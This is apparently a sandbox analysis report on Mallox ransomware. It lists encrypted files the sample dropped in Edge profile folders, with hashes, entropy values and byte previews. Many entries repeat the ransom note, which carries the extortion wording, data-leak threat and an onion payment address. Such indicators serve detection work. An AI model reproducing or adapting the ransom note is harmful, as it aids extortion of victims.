                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-651E8F64-1910.pma

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):4194412
                    Entropy (8bit):7.999956721615571
                    Encrypted:true
                    SSDEEP:98304:yCP8C4oD9AfjgIfGfpZyy9+ldsBUh+q0DO9zuQ95cxDpJ/xh:yTrohAfj0hZyy9+jsGhkO9KQv+nxh
                    MD5:5786792C107FAC4D3F0C3AC49847380B
                    SHA1:A277F237ED6D2C51F0564DA58CE7C3CFB14056DC
                    SHA-256:EF10295F1A1D005C2D05916035C732AEF1A2A81B12CF92560AD94380C82A0350
                    SHA-512:594D89483FA6D52FD7FA63F0E0CF609313AA8B262E255F510381AE0E1EA9C5EF21C0606AB93D188D259475B91757226CC6BA39A57506B2FEEA2FD19501FFAEC0
                    Malicious:true
                    Preview:.1W.....Q$.....-..6..A.KX...l..nZ.....|..c...cl..\1....z....R.`...Z.*h..N..?(.:.'Q{.p1J...p......E#.O.....cKU..&..,.....I...m.....V... 'K.z......a....WSt).1A?...c/.9..9..8..QZY.H...|.......l....=.X...[....r..=R.0..UO..n......G......"....0K..s,sh....X.tT..X!.._.1...%..X....P2.'...Lm..W...`O!..!,.G.......>.W...FLWL..%....`....H.....6$.'..(C..[...;...y...|+..."~Y.I../|&6..wv...R-U..c.....7*Tf.....gE..+=....6..c........o.5L.S....N @O.d...4.e..=.k.j..$`........8...=+.aA.H.c.M5O.h0..=...<N.6!.o....<X[..*v.[.,.OTo6.....v.j)..=C...=...&..5....}.....T.X.z.e.y..l.}.zS...4.<J...9.:L-..w._.=C....@...9c..4.H.oUN..e..X.}.].%..%.%.y.....X.q....`..Q.#..8..e..Z.....km.-.n..4....}......}..S.}N.q.}Y..B.."..\..L...o..Il.....Wf.i..E....j.b..P...S.\.v;....]...g.[R.[.....]u}...x....7......f..['fPO.......a.7.{..I...C..k~+....WK.tz..mBt.sBiJ.W..i.^..[......L..t\........m..@_r.R..a.q..'...`.W1..N...HJ.9g...kU..K2...1.zE.ZD.\.....d...w|cl.........@...R..9......;.-..]k....

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-651E902E-1634.pma

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):4194412
                    Entropy (8bit):7.9999536842634855
                    Encrypted:true
                    SSDEEP:49152:gOhpueJ9aHWFZuiqA2S7A8PUDL0veWsF9e4pEEOCUUzckj3xMClTYppsbRy1g2km:FgqKOqS9+vM4pdOMJjHl4qbwTZu2
                    MD5:3D4F4D8047401CFBD0BA3846A43F706F
                    SHA1:D1749A7D55ACD1E53E081FCCA3266212F7C05F75
                    SHA-256:2FC5BCACE03AD85913CEEDDE459329C624DCA9260F5F9D079F1279CD846E7E9A
                    SHA-512:392964D9648A65E4682FFA469BBA308F05BAB578DBD7E222EED9325B1D4678473CB402CA6AF7D619F2EBF7FD7476BEA941B2CB6246C9CB706C5DA026E9B7EA58
                    Malicious:true
                    Preview:q.T^mc.D.%..[.!R..d.UZ....*.+0.j..dc.m.....P......\......M.m..<)...~.~L~../q..n-.........l.W!...E..x.:...aoA.....f1....C.w.F..[.A...].Y5|U.J%'._......Np..]...I....,..B.Iv.I.....)]V#....m..p...o......Z.0 .X..2i3.....cb..rS=n..Z.di.?..FD.G|......iT..|....?.....2Cs.f..J%.7:.XW..;4.........*.&.i...U.\.I..C.^...c.E..8|....t....bG.h.#.f.I..rw....m...x.].......3._1.Nc..4..|H?....ym#6..^...m7..5..I....O.f.U>.w....`.JIO.:.$...W...f5.D/..rU....v.||e..{.....P..~.>*.X9..6,..eW....P..B......1?.).t..|..5h5.,....H..*}..s.........R&..iH|.6(h..`.%.....Zx...k."hf..X.\..."U *..)|GY|...v...%".R]K....a&._..{....2..,\".b....^.+).t..;..~......ed2_,*!I.P...r...w.:.....'.....Z......C....r..1.$.y......P.@.8...d......u...k.....:u._..(3.... ....S%I..w.u3...ReS.f.....(...y..+...I.^JZ.l..Ab.o.~...m.. ..c.-M7#.,R1Q.].......l2.|.<.C[..,.V&...\5..-..N_.....'\...n.|.8Z:X...A.7...W.$ ..;H.O.......H..\..~..:[..x.7."...K..9&.#..[.......dg..Y2......P....V.B.#d.#....2.}.M...

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-651E9065-1B98.pma

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):4194412
                    Entropy (8bit):7.999952871749424
                    Encrypted:true
                    SSDEEP:98304:qmjFbpPYUgT6IulnK7mCd9KWS1f4QMUn9gjNxwVR1fpCdKB:rPPYUgTxanA9KcVU9INxgR1fsdKB
                    MD5:380161468FE1E0F941368E9F9E7C5E9B
                    SHA1:C87210CED8BD60F00FFFE3F26BCCA5DB76678E39
                    SHA-256:D877BC804B6FCAD50B32FEFAC93A1FB0413E748C343B2F42C8B493CB319FE8D9
                    SHA-512:892D5960ACD0BFA8D4C18DBF0A83DECC893E55557DBB0F3B79B3AA139EE915177CFD8B85C9FB1317FF77C2F73BE83FE02855CFFBE96BA58234029B46A2958611
                    Malicious:true
                    Preview:...pi..?..r_...........^...=..:.w...,4o...D......X...R9.....[....%.t..&+. .t.....R.>......3Y6...u...VkX.KX6,...{\v^.G".h....k}.Dg..h.p..K.o.....+P/./...M]MP........:v......<..9..WC'I.j.$..4...K.../)=......Yv~.I..qs.L .);...W..@4.M....#.x...%]i...II#...j.c..y........fH./.Oo...F..a=.55...c.N...w.;{.A.x...u.i?h1.E.9.S+."./n.`.=).U....5".d.....2.c.......t......R]J.X..=.......D....u{=.....J,...5.S.4T..~..[I*.H..i.-.....)...@O.i...[.~.u.......M...*..4...M...........xK..;...9..?.0...!....,Si.lqoM.,..y...N..U.\.X.... ....B..s...6.A..N.Gpr.y0...k.!?...).M.... ..q.*......u;tn.1...V....p.#.&67z..:.5e9&...D......Ex..PL.".r..Rs.M>.1.E..._.2.F..`.Q"...<......_..K...|../.i....uk/......bU..JUvk.=..H..e.......B.X..W.j^f........Ef......$n0?.EW.r....j.......kcm.SZ.O_.......l\..:..qao..>e..b.f...`eT=CJ........./8HD..O'N....f.<.....n.+T......#0.Ta.%.).....Fi....n...-.....t..u...N`....`.u..vj.8*q.....}.)S....^P.\.f......y\.0.O.>...lFU..L...b..3...2_.~.._..mo+.

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\CertificateRevocation\6498.2023.8.1\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\CertificateRevocation\6498.2023.8.1\crl-set

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):22573
                    Entropy (8bit):7.992096164351853
                    Encrypted:true
                    SSDEEP:384:0xwpifVlBd7o7dbt3waP+iXwOwe/enOz62lZFXUu6JbXC9BrV78nxPxY7U2eDv:/IzoxbiaPtwOwOUilZ6pbmBUxpYYX
                    MD5:C42AD827D6DA4690E3B724029707C5F9
                    SHA1:6A8C601F3B3EE544E984A8762A82FDA255F64054
                    SHA-256:BD494370FC0E38A12AC36A27A391F6C2C38D137B1C073512C6B70306C4480DE8
                    SHA-512:C856457920867925BF656092F510672CC1CD03DB43FE3A474EC0FB25A22F03146324F1A792836EFC150C5CC8DB628E5AD72CF3F5275B1E3E1C8E997BF7848050
                    Malicious:true
                    Preview:.Z"...$J|..N...X\.n....._3.I.t....8.L.xcMuO....n....W!ayu2...e..n>~.]%.....s.v....s.q....K.UY....5..K..^...?.6.>C.RdF.[X....- Bn......@a.%8.........b...E.:....d./...=R...Q.)../ .,..+.:.$.b..b...v...m).6.O..m\~.|}|...)VZ.....?.......G]....+......v..<.....7.V.P..I7.O....(?~D...T7....R..'.3..0.[....A......>.n......n.8.7&./...{.P..(...1O#..Y..E....ZY....h...u.T.N..;@.....0D.&....$..%.+.....oi....M.A.._......N1n. ..@.N..N...n_V".....a.w.o...~.I..[}._.,....l\...........u6|wO,B.n}..f...'.)Z..i....E2>.@..j*y...."...x......KY@.}......&......=..4..hQ..!aS9..].p`C..GB"c..p'N.w..Srx&1Bu.q+:.D..y....Y)..v...0`3.'FM/..T.T...E2.N.V.qv.b.7..ZN........?....HP..*......5.m...f.....C.W2..)..7c...).../..w....-/.MoS^-,^1..Z...Ude.w^s.,O...z..[..[.....{b.'`...%._.U=.i.../.>.`F_.-.6....<*6...,......:t.Q/.......%;...O~^.....K.\...L....V.I.|...P.|-Q.{....k..0.@...3..`-.P.....G..1. ....!p.....A....1.e..t....C...f.A>V)4...X..................cD...

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\CertificateRevocation\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\attachments\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\000003.log

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):480302
                    Entropy (8bit):7.999595809105567
                    Encrypted:true
                    SSDEEP:12288:Po/C9soKGuuE51tS8wKDp/ML3nm1pNyZw4m7okHi/9:w/CTIYKc3ny7yY7okH0
                    MD5:F8B607463083FAC6AD2032A0E7C37F90
                    SHA1:2162866FC38EA959EB80F62474674A7CD0BBF817
                    SHA-256:03DB3F2E70A884C43A8EF1116D639A29FE2FF00BB675231AC0863A45F0A3DFBF
                    SHA-512:D548CFF5343CFA75002F2D98411FB1569457FD7468E8D6707E38869AD59EFA7E80FE2AD7A97582325791B2C6331218045ADAC0EAEFAFDDDBDA35370040F6172C
                    Malicious:true
                    Preview:^.;L.C..lU..(3......r..JO..u..s.8........R.......o..3.IoH.z./.-..a..L|...U...@d.K.....{..Lo.]D..e..C......8V...Q..`4.s.@B.U......r.o>5.}A..'.S...o..c.......8N..(*xy...s..R....J......i1......j..9.RC..0>...s.=.R|n.y.5<.{..&...,.(.............*..w.?...?.X.k...1..#..%..`d.?...]...Z.2..^;/..@..L@.q.....:...h..7......&Y.7W.2......,........hs..Le.d.....t@!?....D{..........T0...}....p...J.&.ZT..S.>`....=..\...5. .!.J.@.mZ.3.:...r.Yp.....\Z..<..4.FBxKX.=l.....ygD.............7p..J..SZ ....W.f.Ae...2....Nf..ZF$..5...5B....M.^.....u..;.F@....r{...V.<..Z....'.>...P.........E..h..yM..c...>.....m4F{].t..q..h......R.*.Z.l.q.....B..MKX..aC........E.u..K.&PL..}.......=.zX...;..M.{.Yj/.@O...N.1....7.$D.R;..] .......cD..z.pp.....%...{..J.......u.."".jC....@T:@g.RD4.\..F...B.%...;.....m.:>...SC6ak.I..&..g..^&...#.c.7_.....|.i..7.4.....q+......n.N.b.Q........a_Z..J>....v>|.T%..W2..?&@...........n.~.+..A.c..9....,,)..74l..HG...^....>^..#...{Va....rt..>..f...:..8.

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AssistanceHome\AssistanceHomeSQLite

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):12396
                    Entropy (8bit):7.9853070518483085
                    Encrypted:false
                    SSDEEP:384:Od4F1KVSA3aLX4D2r4gHCUCC6YIpBIy73+N0TRZodQ:Odxjaj4yrl/q1Poa
                    MD5:294B1CA03F6AF0CB69BCDF78F105254E
                    SHA1:2605BC408FBB984193A034C35186006A368FBE47
                    SHA-256:4FC288954BF8778AC55A041800740DF1A1BE0A2C86E23F1938334378A824CED4
                    SHA-512:6C15F58ECAD67B0B23B00F7F73482D4A816CDAFA3B9F5D7EA8CAAD29825BB2A5AE6CF03B830A8D2863D01C1C0C5EDCDC8EB01CAB4F4E8F6A9C71D3404EB21A3E
                    Malicious:false
                    Preview:.B..N.<.tO.T`e...8E........_....-..e..$=d/[>K(..5-@.......g.W6....(..c.ECd..'n.`]k..)....K.r^j.H~.*.{I.%t.<...m.7.......e)~.+.mN....S.R9....W......vE.x......,t.......G....`.QQ.+f.j...[.Dyo.....y....4..?-......f,.Pu.. ...............<...\.....s.~..\GL#......l1.3).:a..C..p...o...>..j.;.h....e.........lU..P.....g.. ...Y.....v.z.4.b..*.......nF..pba@.:...........{0Bw.K...s.8..I...s/..5.\.;.*.950@9i.n.&..^..`..{L...D......8..n.[.m9....*:2.R....L....9.&.)6.t.e.bK.V.j...e.....1..O..@!....u......^.o....SN4&..E.m3.B5...DG.U..<-G....y...r.............6..(..=T...;.*N..Y...X.S.~\k.{..........K".~...x...NO.^/.E....f....d...W..Q..G_c...,.F...>s.e$Z.n.......>...*{zL......Y..P.a.7EQ. .........M$=f..'.....-V....]5x..B.....&.....(....-..YE?.../D.....J...=d.q....X.~lA..t..;.glz..5.9]..'..I..........[.,._....n...G.,...$6$.T..........p{..v......`MW(.W@F%:..[.Vd...j.)q.<...)..{.J.F.Q.........X.E={..:n..f.iKe...........(.{..2.8_..vJ..C.K^.m........t..

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AssistanceHome\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AutofillStrikeDatabase\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
